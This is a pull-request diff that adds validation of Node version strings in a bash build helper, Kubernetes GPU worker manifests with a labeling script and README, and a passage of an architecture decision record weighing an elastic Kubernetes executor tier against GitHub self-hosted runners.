### PR TITLE
Reconcile mac<->mac-dev: dev->mac ports (blocks C, D, E)

### DIFF
--- a/deploy/codex-runner/mac-task-executor-opencode-build
+++ b/deploy/codex-runner/mac-task-executor-opencode-build
@@ -384,46 +384,62 @@ gate_detect_test_command() {
     return 1
 }
 
-# Helper: resolve the Node version a JS project requires. Checks (in order):   1. .nvmrc in the project dir   2. .node-version in the project dir   3. engines.node in package.json (strips semver range operators)   4. node-version: field in any .github/workflows/*.yml or .gitea/workflows/*.yml Prints a bare version string (e.g. "22" or "22.12.0") or nothing if unknown.
+# Validate a Node version token BEFORE it is interpolated into the shell that
+# runs `nvm install/use`. .nvmrc / .node-version / engines.node / CI-workflow
+# values are repo-controlled (semi-trusted), so accept ONLY a bare semver
+# (e.g. 20, 20.11, 20.11.1) or an `lts/<name>` alias; echo nothing for anything
+# else so the caller falls back to system Node. This keeps shell metacharacters
+# out of the `nvm` command line (gate-node-version-injection-01, ported from
+# mac-dev). Always pass the token quoted; under `set -u` callers must supply an
+# argument (the empty string is fine).
+_validate_node_version() {
+    case "$1" in
+        lts/*)
+            printf '%s' "$1" | grep -E '^lts/[A-Za-z0-9._-]+$' || true ;;
+        *)
+            printf '%s' "$1" | grep -E '^[0-9]+(\.[0-9]+){0,2}$' || true ;;
+    esac
+}
+
+# Helper: resolve the Node version a JS project requires. Checks (in order):   1. .nvmrc in the project dir   2. .node-version in the project dir   3. engines.node in package.json (strips semver range operators)   4. node-version: field in any .github/workflows/*.yml or .gitea/workflows/*.yml (project dir AND repo root, so a subdir project inherits the root workflow — H1). Every candidate is routed through _validate_node_version, so a hostile declaration yields nothing and the gate falls back to system Node. Prints a validated bare version (e.g. "22" or "22.12.0") or an lts/* alias, else nothing.
 _resolve_node_version() {
-    local pdir="$1"
+    local pdir="$1" v=""
 
     # 1. .nvmrc
     if [ -f "${pdir}/.nvmrc" ]; then
-        tr -d '[:space:]' < "${pdir}/.nvmrc"
-        return 0
+        v="$(tr -d '[:space:]' < "${pdir}/.nvmrc" 2>/dev/null | head -1)"; v="${v#v}"
+        v="$(_validate_node_version "${v}")"
+        if [ -n "${v}" ]; then echo "${v}"; return 0; fi
     fi
 
     # 2. .node-version
     if [ -f "${pdir}/.node-version" ]; then
-        tr -d '[:space:]' < "${pdir}/.node-version"
-        return 0
+        v="$(tr -d '[:space:]' < "${pdir}/.node-version" 2>/dev/null | head -1)"; v="${v#v}"
+        v="$(_validate_node_version "${v}")"
+        if [ -n "${v}" ]; then echo "${v}"; return 0; fi
     fi
 
-    # 3. package.json engines.node
+    # 3. package.json engines.node (drop range operators; keep bare major[.minor[.patch]])
     if [ -f "${pdir}/package.json" ]; then
-        local ver
-        ver="$(python3 - "${pdir}/package.json" <<'PYEOF' 2>/dev/null
+        v="$(python3 - "${pdir}/package.json" <<'PYEOF' 2>/dev/null
 import json, re, sys
 try:
     p = json.load(open(sys.argv[1], encoding="utf-8"))
-    raw = (p.get("engines") or {}).get("node", "")
-    # strip range operators: >=18, ^22, ~20, 22.x -> bare major
-    m = re.search(r'(\d+)', raw)
+    raw = (p.get("engines") or {}).get("node", "") or ""
+    # keep the first bare version token, dropping range operators (>=, ^, ~, x)
+    m = re.search(r"[0-9]+(?:\.[0-9]+){0,2}", raw)
     if m:
-        print(m.group(1))
+        print(m.group(0))
 except Exception:
     pass
 PYEOF
 )"
-        if [ -n "${ver}" ]; then
-            echo "${ver}"
-            return 0
-        fi
+        v="$(_validate_node_version "${v}")"
+        if [ -n "${v}" ]; then echo "${v}"; return 0; fi
     fi
 
     # 4. CI workflow files (.gitea or .github). Search BOTH the project dir's own workflows (root-level project) AND the parent's (subdir project whose workflows live at the repo root) — searching only "../" missed root projects entirely (H1).
-    local wf ver
+    local wf
     for wf in "${pdir}/.gitea/workflows/"*.yml \
                "${pdir}/.gitea/workflows/"*.yaml \
                "${pdir}/.github/workflows/"*.yml \
@@ -433,15 +449,18 @@ PYEOF
                "${pdir}/../.github/workflows/"*.yml \
                "${pdir}/../.github/workflows/"*.yaml; do
         [ -f "${wf}" ] || continue
-        ver="$(grep -m1 -Eo 'node-version:[ ]*[0-9]+' "${wf}" 2>/dev/null | grep -Eo '[0-9]+' || true)"
-        if [ -n "${ver}" ]; then
-            echo "${ver}"
-            return 0
-        fi
+        v="$(grep -m1 -Eo 'node-version:[[:space:]]*["'\'']?[0-9]+(\.[0-9]+){0,2}' "${wf}" 2>/dev/null | grep -Eo '[0-9]+(\.[0-9]+){0,2}' | head -1 || true)"
+        v="$(_validate_node_version "${v}")"
+        if [ -n "${v}" ]; then echo "${v}"; return 0; fi
     done
 
-    return 1
+    # No declaration found (or all candidates rejected by validation): print
+    # nothing and succeed so the caller falls back to system Node. (`return 0`,
+    # not 1 — the caller reads stdout, and a non-zero here would only matter to
+    # a `set -e` context.)
+    return 0
 }
+# --- end node-version resolution helpers (validated; gate-node-version-injection-01) ---
 
 # Helper: resolve the Python version a project requires. Checks (in order):   1. .python-version in the project dir   2. project.requires-python / tool.* in pyproject.toml (bare major.minor) Prints a bare version (e.g. "3.13") or nothing if unknown.
 _resolve_python_version() {

--- a/deploy/k8s/gpu-worker/README.md
+++ b/deploy/k8s/gpu-worker/README.md
@@ -1,0 +1,128 @@
+# GPU worker nodes
+
+Turn a fleet GPU host (hostb, hostc) into a Kubernetes **GPU worker node** so
+the elastic executor tier ([ADR 0005](../../../docs/adr/0005-elastic-executor-tier-vs-static-fleet.md))
+can run `nvidia.com/gpu`-requesting Jobs on it.
+
+> **Why this is now worth doing for hostb.** The thing that used to "block" the
+> GPU — the long-lived vLLM "LLM brain" Deployment — serves **≈0 hub traffic**
+> (live `llm.route` telemetry, 2026-06-11: 994/1000 routed to cloud `nvidia`, 0
+> to hostb's vLLM, because no caller requests its `Qwen/...` model). See the ADR
+> Evidence section. So the GPU can be **dedicated** to executor Jobs rather than
+> carefully time-sliced around an idle service.
+
+This tree contains the substrate only. It does **not** install drivers (already
+present on the GPU hosts) and does **not** itself schedule GPU work — wiring the
+MAC runner to request GPUs is the documented draft in
+[§ Make GPU Jobs request the GPU](#make-gpu-jobs-request-the-gpu) below.
+
+## Layout
+
+```
+deploy/k8s/gpu-worker/
+├── README.md                     ← you are here
+├── nvidia-device-plugin.yaml     ← DaemonSet: advertises nvidia.com/gpu on labeled nodes
+├── label-gpu-node.sh             ← imperative: label (+ optional taint) a node
+└── kustomization.yaml            ← applies into kube-system
+```
+
+## Prerequisites (per host)
+
+Verified present on hostb (RTX 6000 Ada) and hostc (GB10) in ADR 0005:
+
+- NVIDIA driver loaded (`nvidia-smi` works).
+- **NVIDIA Container Toolkit** (`nvidia-ctk`) + **containerd**, with the `nvidia`
+  runtime wired as containerd's default (or as a `RuntimeClass`). This is the
+  exact mechanism that *cannot* exist on macOS — which is why **hostd is not
+  a candidate** (its Metal GPU is unschedulable; its image-gen stays an
+  off-cluster native service).
+- The node has **joined the cluster** as a worker (kubelet running). `hosta` is
+  the intended control-plane / CPU node; it has no container runtime today, so
+  add containerd there before it can host anything.
+
+hostc caveats (from ADR 0005): it's **arm64** (mixed-arch cluster → build
+workload images for arm64 too) and runs a **kernel-coupled driver** (`6.17-nvidia`
++ driver 580) — keep the per-kernel module package matched (see the
+`reference-fleet-gpu-capability` memory for the exact `apt-get` fix).
+
+## Apply
+
+```bash
+# 1. Label the node (run from a context with the cluster's kubeconfig).
+#    Plain label  -> GPU shareable with other pods.
+#    --taint      -> dedicate the node to GPU work (CPU executor Jobs stay off it).
+deploy/k8s/gpu-worker/label-gpu-node.sh hostb --taint
+
+# 2. Roll out the device plugin. It only lands on nodes carrying the
+#    mac.fleet/capability-gpu=true label set in step 1.
+kubectl apply -k deploy/k8s/gpu-worker
+
+# 3. Verify the node now advertises GPUs as a schedulable resource.
+kubectl describe node hostb | grep -A2 'Capacity:' | grep nvidia.com/gpu
+#   nvidia.com/gpu:  1
+kubectl -n kube-system get pods -l app.kubernetes.io/name=nvidia-device-plugin -o wide
+```
+
+A quick end-to-end check that GPUs are actually schedulable:
+
+```bash
+kubectl run gpu-smoke --rm -it --restart=Never \
+  --image=nvcr.io/nvidia/cuda:12.4.1-base-ubuntu22.04 \
+  --overrides='{"spec":{"nodeSelector":{"mac.fleet/capability-gpu":"true"},
+    "tolerations":[{"key":"mac.fleet/gpu-only","operator":"Exists"}],
+    "containers":[{"name":"gpu-smoke","image":"nvcr.io/nvidia/cuda:12.4.1-base-ubuntu22.04",
+      "command":["nvidia-smi"],"resources":{"limits":{"nvidia.com/gpu":1}}}]}}'
+```
+
+## Conventions
+
+- **Label:** `mac.fleet/capability-gpu=true` — the k8s analogue of the
+  `capability-gpu` node label proven in ADR 0005's kind/colima experiment, in the
+  same `mac.*` namespace as the runner's Job labels (`mac.task.id`, `mac.role`, …).
+- **Optional taint:** `mac.fleet/gpu-only=true:NoSchedule` — keeps non-GPU Jobs
+  off the scarce GPU host. GPU Jobs (and the device plugin) must tolerate it.
+- **Namespace:** the device plugin is node infra → `kube-system`. App workloads
+  (mac-api, mac-runner, task Jobs) stay in `mac`.
+
+## Make GPU Jobs request the GPU (draft — not yet wired)
+
+The device plugin only *advertises* GPUs; the MAC runner must *request* them for
+GPU-tagged tasks. Today `build_job_spec()` in
+[`src/mac/k8s/runner.py`](../../../src/mac/k8s/runner.py) emits a CPU-only pod
+template via `_build_executor_pod_template()`. The minimal change: when a task's
+`required_capabilities` contains `gpu`, inject a nodeSelector, the taint
+toleration, and an `nvidia.com/gpu` limit. Sketch:
+
+```python
+# in _build_executor_pod_template(...), after the base pod spec is built:
+needs_gpu = "gpu" in {str(c) for c in (task.get("required_capabilities") or [])}
+if needs_gpu:
+    pod_spec["nodeSelector"] = {"mac.fleet/capability-gpu": "true"}
+    pod_spec.setdefault("tolerations", []).append(
+        {"key": "mac.fleet/gpu-only", "operator": "Exists", "effect": "NoSchedule"}
+    )
+    container["resources"].setdefault("limits", {})["nvidia.com/gpu"] = "1"
+    # nvidia.com/gpu is integer-only and not over-committable: requests==limits
+    # is enforced by k8s, so do NOT also set it under requests.
+```
+
+This keeps capability matching in the ledger (a task labeled `gpu` lands on a GPU
+node) without a second scheduler — consistent with ADR 0005's "the MAC ledger
+stays the single dispatch brain." Land it behind a test in `tests/` alongside the
+existing `build_job_spec` coverage before enabling.
+
+## What about the vLLM brain?
+
+Because it serves ≈0 traffic, the simplest path is to **stop the vLLM Deployment
+and dedicate hostb's GPU to executor Jobs**. Before decommissioning, confirm
+there's no out-of-band direct consumer (the hub telemetry can't see processes
+that hit `hostb:8000` directly):
+
+```bash
+ssh dev@hostb.local "curl -s localhost:8000/metrics | grep request_success_total; ss -tnp | grep :8000"
+```
+
+If you still want a local-LLM fallback, keep a **right-sized** vLLM and share the
+GPU via [time-slicing / MPS](https://github.com/NVIDIA/k8s-device-plugin#shared-access-to-gpus)
+(a `ConfigMap` for the device plugin) instead of letting one model server hold the
+whole card — but don't let a 0-traffic service block the node.

--- a/deploy/k8s/gpu-worker/kustomization.yaml
+++ b/deploy/k8s/gpu-worker/kustomization.yaml
@@ -1,0 +1,7 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+# The device plugin is node-level cluster infra, so it lives in kube-system
+# (NOT the `mac` app namespace used by mac-api / mac-runner).
+namespace: kube-system
+resources:
+  - nvidia-device-plugin.yaml

--- a/deploy/k8s/gpu-worker/label-gpu-node.sh
+++ b/deploy/k8s/gpu-worker/label-gpu-node.sh
@@ -1,0 +1,46 @@
+#!/usr/bin/env bash
+# Mark a fleet host as a MAC GPU worker node.
+#
+# Node labels can't be expressed as an applyable manifest (Node objects are
+# created by the kubelet at join), so the capability label + the optional
+# "dedicate to GPU work" taint are applied imperatively here.
+#
+# Usage:
+#   ./label-gpu-node.sh hostb           # label only (GPU shared with other pods)
+#   ./label-gpu-node.sh hostb --taint   # label + taint (GPU node runs ONLY gpu jobs)
+#   ./label-gpu-node.sh hostb --unset   # remove label + taint
+#
+# After labeling, `kubectl apply -k deploy/k8s/gpu-worker` rolls the device
+# plugin onto the node, and `kubectl describe node <name>` should then show
+# `nvidia.com/gpu` under Capacity/Allocatable.
+set -euo pipefail
+
+NODE="${1:?usage: label-gpu-node.sh <node-name> [--taint|--unset]}"
+MODE="${2:-label}"
+
+CAP_LABEL="mac.fleet/capability-gpu"
+GPU_ONLY_TAINT="mac.fleet/gpu-only"
+
+case "$MODE" in
+  --unset)
+    echo "==> removing GPU worker label + taint from node/$NODE"
+    kubectl label  node "$NODE" "${CAP_LABEL}-"            --overwrite || true
+    kubectl taint  node "$NODE" "${GPU_ONLY_TAINT}-"                   || true
+    ;;
+  --taint)
+    echo "==> labeling node/$NODE as GPU worker AND tainting it gpu-only"
+    kubectl label  node "$NODE" "${CAP_LABEL}=true" --overwrite
+    # NoSchedule => only pods that tolerate mac.fleet/gpu-only land here, so the
+    # scarce GPU host isn't filled with CPU executor Jobs.
+    kubectl taint  node "$NODE" "${GPU_ONLY_TAINT}=true:NoSchedule" --overwrite
+    ;;
+  label|*)
+    echo "==> labeling node/$NODE as GPU worker (GPU shareable with other pods)"
+    kubectl label  node "$NODE" "${CAP_LABEL}=true" --overwrite
+    ;;
+esac
+
+echo "==> current GPU-relevant state of node/$NODE:"
+kubectl get node "$NODE" -o jsonpath='{.metadata.labels.mac\.fleet/capability-gpu}{"\n"}' \
+  | sed 's/^/   capability-gpu label: /'
+kubectl describe node "$NODE" | grep -E 'Taints:|nvidia\.com/gpu' || true

--- a/deploy/k8s/gpu-worker/nvidia-device-plugin.yaml
+++ b/deploy/k8s/gpu-worker/nvidia-device-plugin.yaml
@@ -1,0 +1,69 @@
+# NVIDIA k8s device plugin — exposes GPUs as the schedulable resource
+# `nvidia.com/gpu` so MAC executor Jobs can request them.
+#
+# Prerequisite (already true on hostb + hostc, per ADR 0005): the host has
+# the NVIDIA driver + NVIDIA Container Toolkit (`nvidia-ctk`) + containerd, and
+# containerd's default (or `nvidia`) runtime injects the driver into containers.
+# This DaemonSet does NOT install drivers — it only advertises the GPUs that the
+# toolkit makes visible. It is the one mechanism that *cannot* exist on a macOS
+# host (see ADR 0005), which is why hostd is excluded.
+#
+# It lands ONLY on nodes explicitly labeled `mac.fleet/capability-gpu=true`
+# (see label-gpu-node.sh / README), so a stray CPU node never tries to run it.
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: nvidia-device-plugin
+  namespace: kube-system
+  labels:
+    app.kubernetes.io/name: nvidia-device-plugin
+    app.kubernetes.io/component: gpu-worker
+    app.kubernetes.io/managed-by: mac
+spec:
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: nvidia-device-plugin
+  updateStrategy:
+    type: RollingUpdate
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: nvidia-device-plugin
+        app.kubernetes.io/component: gpu-worker
+    spec:
+      # The plugin must come up before GPU workloads can schedule.
+      priorityClassName: system-node-critical
+      # Only run on fleet hosts we've opted in as GPU worker nodes.
+      nodeSelector:
+        mac.fleet/capability-gpu: "true"
+      tolerations:
+        # The standard taint the NVIDIA device plugin tolerates.
+        - key: nvidia.com/gpu
+          operator: Exists
+          effect: NoSchedule
+        # The optional MAC "dedicate this node to GPU work" taint (see README) —
+        # the plugin itself must still schedule there.
+        - key: mac.fleet/gpu-only
+          operator: Exists
+          effect: NoSchedule
+      containers:
+        - name: nvidia-device-plugin
+          # Pin a digest in production (mirror the image-pinning convention used
+          # by mac-api / mac-runner deployment.yaml).
+          image: nvcr.io/nvidia/k8s-device-plugin:v0.17.1
+          imagePullPolicy: IfNotPresent
+          env:
+            # Fail loudly if the node can't actually see a GPU, rather than
+            # silently advertising zero and masking a driver/toolkit problem.
+            - name: FAIL_ON_INIT_ERROR
+              value: "true"
+          securityContext:
+            # The plugin needs raw access to the driver / device files.
+            privileged: true
+          volumeMounts:
+            - name: device-plugin
+              mountPath: /var/lib/kubelet/device-plugins
+      volumes:
+        - name: device-plugin
+          hostPath:
+            path: /var/lib/kubelet/device-plugins

--- a/docs/adr/0005-elastic-executor-tier-vs-static-fleet.md
+++ b/docs/adr/0005-elastic-executor-tier-vs-static-fleet.md
@@ -1,0 +1,317 @@
+# ADR 0005 — Elastic executor tier vs. the static fleet (and "every agent is a GitHub runner")
+
+- Status: **Proposed**
+- Date: 2026-06-11
+- Decision owner: Dev User
+- Context: the fleet is configured statically in `~/.mac/fleets.yaml` — named
+  agents pinned to hosts (hosta→node1, hostc→hoste, hostd→hostf,
+  hostb→hostb), each deployed by `deploy/deploy-mac-fleet.sh` as a long-lived
+  editable install + systemd/launchd services. The question raised: *what if
+  every agent were a GitHub self-hosted runner (and any runner an agent), with
+  agents registered/created dynamically rather than declared statically?*
+
+## Recommendation (the short version)
+
+**Do not make agents GitHub runners.** Get the elasticity you want by adding an
+**ephemeral executor tier on k8s Jobs** — which this repo already has (autopilot
+/ `job-per-task`) — autoscaled off the MAC ledger's ready-queue, while keeping
+personas + shared services persistent. The MAC ledger stays the single dispatch
+brain.
+
+GitHub self-hosted runners are the **wrong substrate** for this fleet: they add a
+second control plane and identity/label registry that *duplicate* the ledger and
+its capability matching; they only fit the repo/CI subset of the work (the rest
+gets forced through awkward `repository_dispatch` RPC); and they put agentic code
+next to repo-write + secrets (GitHub's canonical self-hosted-runner footgun).
+GitHub's only sensible role is the **inverse** of the proposal — a GitHub CI
+event *creates a MAC task* (GitHub feeds the ledger; it does not replace it).
+
+Separating the two ideas in the question:
+
+| Idea | Verdict |
+| --- | --- |
+| Move off the static `fleets.yaml` to **dynamic/elastic** capacity | **Yes** — overdue; it's behind most of our operational pain. |
+| **Agent ≡ GitHub runner** | **No.** The executor tier *should* be stateless and elastic, but **k8s Jobs** are the right substrate here, not GitHub runners; and persona/services agents must stay **persistent** (soul/memory/Slack identity, the vLLM brain). |
+
+A GitHub runner is stateless, fungible, short-lived; a MAC agent (as built) is a
+stateful persona, and that model (ADR 0001) is worth keeping. The fix is a
+**two-tier split** — persistent personas/services + an elastic ephemeral-executor
+tier on k8s — **not** turning every agent into a runner.
+
+## What is actually true today (ground truth)
+
+- **Static fleet.** `~/.mac/fleets.yaml` enumerates agents→hosts with
+  capabilities + `hub_agent`; `deploy/deploy-mac-fleet.sh` SSHes to each host,
+  installs `~/.mac/src/mac` (`pip install -e`) and runs services (control plane
+  `mac.service` on the hub; worker loop + Hermes gateway per agent).
+- **Agents are durable personas.** Per-agent soul/memory (Qdrant + holographic
+  tiers), mood, journal, Slack home channel, ongoing presence, banter,
+  service-role election. This is the opposite of a disposable job.
+- **Dispatch is a pull/lease model with rich semantics.** The hub ledger
+  (`mac.db`) holds tasks; agents claim/lease by `required_capabilities` +
+  dependency satisfaction; states include `needs_review/reviewing`; outcomes are
+  gated by **evidence/verification contracts** (`verification_contract_failed`,
+  "repo evidence requires pushed=true / pr_url"), multi-attempt with
+  `deployment_learning`s, and hardware gating (GPU). GitHub's job scheduler has
+  almost none of this.
+- **Heterogeneous, partly long-lived hardware.** hostb (RTX 6000 Ada) serves
+  vLLM as the fleet's LLM brain; hostd (M4 Pro) does local image-gen; the
+  in-mac router/media-routing fan work to these. These are **services**, not jobs.
+- **The static model's cost, observed directly.** This is where our recurring
+  pain comes from: manual SSH deploys; bearer-token **drift** (a 403 that needed
+  out-of-band recovery); a default-fleet knob we had to add; ~20 stale
+  **beads-bridge** tasks (a static-bridge artifact) making up half the failure
+  rate; and c26 repo tasks failing on **dirty/stale checkouts** of
+  `/home/dev/.mac/src/c26`.
+- **The repo already leans dynamic.** `docs/k8s-native-rewrite-plan.md`,
+  `docs/job-per-task-roles-spec.md`, the `mac autopilot` k8s wiring, and the
+  `devuser-gke` fleet are all "task → ephemeral pod." So we are *already* moving
+  off static; the open question is the substrate, not the direction.
+
+## The fulcrum
+
+GitHub runners are designed to be identical, disposable, and stateless; MAC
+agents are durable identities that evolve. "Any runner can be an agent" works
+only where the work is itself stateless and job-shaped. The mismatch — not the
+elasticity — is what makes the universal equivalence wrong.
+
+## Decision
+
+1. **Two tiers, explicitly.**
+   - **Persistent tier (few):** personas + shared services (LLM router/brain,
+     image-gen, Slack-present teammates). Long-lived (k8s Deployments or a small
+     static set). Owns identity and memory.
+   - **Elastic executor tier (many):** stateless workers that **claim a MAC task
+     → run it in a clean, isolated checkout → emit evidence → exit**. These are
+     the dynamically-registered "runners."
+2. **The MAC ledger stays the single source of truth and dispatch brain.** It
+   keeps the semantics GitHub lacks (deps, review, evidence contracts,
+   capability + hardware gating). The runner substrate is a dumb elastic
+   *where-to-run*, never a second scheduler.
+3. **Autoscale the executor tier off the ready-queue.** The autoscaler polls the
+   hub's `GET /tasks/ready` (shipped in `parity-ready-http-01`) — optionally per
+   project/capability — and scales the ephemeral worker pool to match. An
+   executor's body is essentially `mac task claim → do work → mac task
+   evidence/close`.
+4. **Per-project isolation, not "all projects on every worker."** Capabilities
+   become labels; each project gets its own isolation boundary (k8s namespace +
+   scoped service account / `MAC_API_TOKENS`) so a worker only holds the secrets
+   of the project it serves.
+
+## Substrate decision: k8s Jobs, not GitHub runners
+
+Use **k8s Jobs** for the executor tier. Concretely, because:
+
+- **It already exists here** (autopilot, `docs/job-per-task-roles-spec.md`,
+  `devuser-gke`) — extending it is the lowest-friction path to elasticity;
+  adopting GitHub ARC means standing up a new runner controller, registration-
+  token plumbing, and runner groups.
+- **We control isolation** (namespace / RBAC / network policy) — the right
+  posture for running agentic code, versus self-hosted runners sharing a host
+  with repo-write + secrets.
+- **No second scheduler or registry.** The MAC ledger + capabilities already are
+  the "runner registry + label matcher," and richer (deps, review, evidence). A
+  GitHub runner pool would duplicate that and tempt GitHub's event scheduler into
+  becoming a rival dispatcher.
+
+**GitHub self-hosted runners are explicitly not adopted** as the agent or
+executor substrate. Their real advantages (registration, labels, runner groups)
+just duplicate the ledger; their event/workflow model fits only repo/CI work;
+and the security cost is real. GitHub's one legitimate role is an **inbound
+bridge**: a GitHub Actions event (push/PR/`workflow_dispatch`) calls the hub to
+*create* a MAC task, so external CI can feed the fleet without becoming it.
+
+We keep the executor contract simple (`claim → run → evidence → exit`) so it
+*could* run on a GitHub-hosted runner in a pinch — but that is a fallback, not
+the design. The only thing that would flip this decision is running a k8s
+cluster being off the table; it isn't (`devuser-gke` is already a cluster), so
+GitHub-hosted runners' "no cluster to operate" advantage does not apply.
+
+## Evidence: a live multi-node dispatch experiment (2026-06-11)
+
+The flexible-dispatch claim was **tested, not just asserted**. A real 4-node
+Kubernetes cluster was stood up locally (`kind` on `colima`): one control-plane
+node (the "hub") + three worker nodes labeled to mimic the fleet's heterogeneity
+— `hostb` (`capability-gpu`), `hostd` (`capability-image-gen`), `hosta`
+(`capability-ops`). Four Jobs were submitted with no manual placement:
+
+- `nodeSelector: capability-gpu` scheduled onto the `hostb` node;
+  `capability-image-gen` → `hostd`; `capability-ops` → `hosta`. Every
+  capability-targeted Job landed on exactly its matching node.
+- A 6-completion / parallelism-6 Job with **no** selector spread **2 / 2 / 2**
+  across the three worker nodes on the scheduler's own.
+
+**Proven:** a control-plane + worker-node cluster does capability-aware,
+self-balancing Job dispatch across the fleet with zero per-host static config —
+the elastic-executor property this ADR depends on. (Method caveat: `kind` nodes
+are containers on one VM, so the *physical* distribution is simulated; the
+*scheduling logic* exercised is genuine, unmodified upstream Kubernetes.)
+
+**What it does NOT prove — and why that sharpens the decision.** The literal
+"every host simply becomes a node" does not hold:
+
+- **macOS hosts cannot be Linux-container worker nodes.** hostd (darwin /
+  M4 Pro) has no kubelet running Linux pods, and its **Metal/MPS GPU is not a
+  schedulable k8s resource** at all.
+- **NVIDIA GPUs need device plugins.** hostb (RTX 6000 Ada) and hostc (GB10)
+  require drivers + the device plugin to expose GPUs as schedulable resources.
+- **Cross-network CNI.** Fleet hosts sit on different networks joined by
+  Tailscale; one cluster needs node + pod networking across them (e.g. k3s + an
+  overlay/tailnet CNI) — feasible, not "simple."
+- **MAC semantics are still ours to build.** k8s supplies the substrate; the
+  `claim → run → evidence → exit` executor and autoscaling off `GET /tasks/ready`
+  are not provided by k8s.
+
+### Why a macOS host can't be a worker node — even with Docker + "GPU pass-through"
+
+Established on an M4 Pro Mac (same class as hostd):
+
+1. **macOS doesn't run Linux containers; it runs a Linux VM.** Host kernel is
+   `Darwin 25.5.0 arm64`, but a container on it reports `Linux 6.8.0 aarch64`
+   (Ubuntu): Docker Desktop / colima silently boot a **Linux VM** and run every
+   container inside it (Linux images need Linux-kernel namespaces/cgroups that
+   XNU/Darwin doesn't implement). A "k8s node on the Mac" is therefore the
+   *Linux VM*, not the Mac.
+2. **The Apple GPU is on-SoC + Metal-only — there is nothing to pass through.**
+   `system_profiler`: *Apple M4 Pro, Bus: Built-In, Metal 4* — reached only via
+   the **Metal** API in macOS userspace, not a discrete PCIe card. Linux
+   container GPU access (VFIO/IOMMU + the NVIDIA Container Toolkit) forwards a
+   *PCI device + its Linux kernel driver* into the container; on Apple Silicon
+   there is no PCIe GPU, no Linux driver for it, and Virtualization.framework
+   doesn't expose the GPU to the guest. Inside the container `/dev/dri` and
+   `/dev/nvidia*` don't exist, and `docker run --gpus all` fails outright
+   (`could not select device driver … [[gpu]]`).
+3. **The GPU is reachable only by a native macOS process calling Metal** — which
+   is by definition not a pod; a Linux Job can never touch Metal. (This is why
+   hostd's SDXL/MPS image-gen runs as a native `~/gen` process.)
+4. **Making the Mac a node buys nothing and costs a VM layer:** you'd run Linux
+   pods in a VM on the Mac with no access to the one capability that makes it
+   special — and the genuinely macOS-only work that needs the host (Metal
+   compute; **code-signing / notarization / Xcode builds** — we hit this exact
+   wall when the Electron build required the Mac's "Developer ID" / "Fleet
+   Identity" signing identities) cannot run in a Linux container at all.
+
+### The Linux/NVIDIA hosts (hosta, hostb, hostc) *can* be nodes — container GPU is the supported path
+
+Read-only probes of the actual hosts:
+
+| Host | arch / kernel | GPU (driver) | docker / containerd / nvidia-ctk |
+| --- | --- | --- | --- |
+| **hosta** (node1) | x86_64 / 6.8 | none (CPU-only) | no / no / no |
+| **hostb** | x86_64 / 7.0 | RTX 6000 Ada 48 GB (595.71.05) | **yes / yes / yes** |
+| **hostc** | **aarch64** / 6.17-nvidia | GB10 Grace-Blackwell (580.159.03) | **yes / yes / yes** |
+
+Unlike the Mac, these are architecturally fine as k8s nodes, and the
+**container-GPU mechanism that's impossible on macOS is already installed** on
+both GPU hosts: driver + NVIDIA Container Toolkit (`nvidia-ctk`) + containerd.
+The toolkit is exactly what injects `/dev/nvidia*` + the driver into a container
+under `--gpus all`, and the k8s **NVIDIA device plugin** then exposes
+`nvidia.com/gpu` as a schedulable resource. (The toolkit's presence is the
+dispositive fact — it cannot even exist on macOS, where `--gpus all` errors.)
+
+- **hosta** — CPU-only Linux; the natural **control-plane ("hub") node** and/or a
+  CPU worker. Only gap: **no container runtime today** (it runs the mac services
+  as a bare-metal editable install), so containerd must be added.
+- **hostb** — **GPU worker node: ready.** Add the k8s NVIDIA device plugin and
+  pods can request `nvidia.com/gpu`. The often-cited caveat — "one 48 GB GPU is
+  held by the long-lived **vLLM brain** (a *Deployment*, not a Job)" — turns out
+  to be **hollow**: that brain serves ≈0 traffic (see the routing-evidence
+  subsection below), so the GPU can simply be **dedicated to the executor tier**
+  rather than carefully shared via time-slicing / MPS. (If a local-LLM fallback
+  is wanted, keep a *right-sized* vLLM and GPU-share; just don't let a 0-traffic
+  service block the node.)
+- **hostc** — **GPU worker node: feasible, same mechanism**, with two
+  operational caveats: **arm64** (a mixed-arch cluster — images/workloads must be
+  built arm64) and a **bleeding-edge driver/kernel** (`6.17-nvidia` + driver 580;
+  GB10 drivers are tightly kernel-coupled — the per-kernel-module friction we've
+  seen). Architecturally normal; the work is keeping the driver matched to the
+  kernel.
+
+Crucially, the **only** host that genuinely *can't* be a worker node is the
+**darwin** one (hostd). The GPU hosts *can* be nodes — but their long-lived
+model servers (hostb's vLLM brain) are **Deployments**, not Jobs. So the
+two-tier split maps cleanly onto the hardware: **hosta → control-plane / CPU
+executor nodes; hostb + hostc → GPU nodes hosting a persistent model-server
+Deployment and/or elastic GPU Jobs; hostd → off-cluster persistent
+native-macOS service.**
+
+### The "vLLM brain" serves ≈0 traffic — the GPU it holds is effectively idle (2026-06-11)
+
+A second probe checked whether the persistent service this ADR is most careful to
+protect — hostb's vLLM "LLM brain" — is actually load-bearing. It is not.
+
+Querying the live hosta hub's routing telemetry
+(`mac --fleet hosta observability list --name llm.route`), the last ~1000
+`llm.route` events (spanning 2026-06-08 → 2026-06-11):
+
+| backend provider | events |
+| --- | --- |
+| `nvidia` (cloud inference API, resolving `azure/anthropic/claude-sonnet-4-6`) | 994 |
+| empty / failed route | 6 |
+| **hostb / vLLM / its served model** | **0** |
+
+The cause is structural, not transient. hostb's vLLM *is* wired into the hub
+router — appended to `MAC_ROUTER_PROVIDERS` at priority 0 — but **only for the
+model `Qwen/Qwen3.6-27B-FP8`**. Every fleet agent's `gateway_model` (in
+`~/.mac/fleets.yaml`, including hostb's *own* agent) is
+`azure/anthropic/claude-sonnet-4-6`, which routes to the cloud `nvidia` provider.
+No caller ever requests the model hostb serves, so a 48 GB RTX 6000 Ada sits idle
+on the LLM path. (hostb was additionally tailscale-offline at probe time.)
+
+**Why this sharpens the decision.** The Decision and Risks sections treat "GPU /
+model servers stay persistent services; they are not jobs" as a hard constraint,
+and the hostb node-readiness note above flagged the vLLM Deployment as the reason
+to time-slice rather than dedicate the GPU. The evidence collapses that tension:
+the brain has **no traffic to protect**, so hostb's GPU is the *easiest*, not the
+hardest, to hand to the elastic executor tier — dedicate it outright. The
+persistent-services principle still holds in general (it's right for a brain that
+*is* serving); it just doesn't currently apply to *this* GPU. A concrete
+device-plugin + node-label draft for exactly this conversion lives at
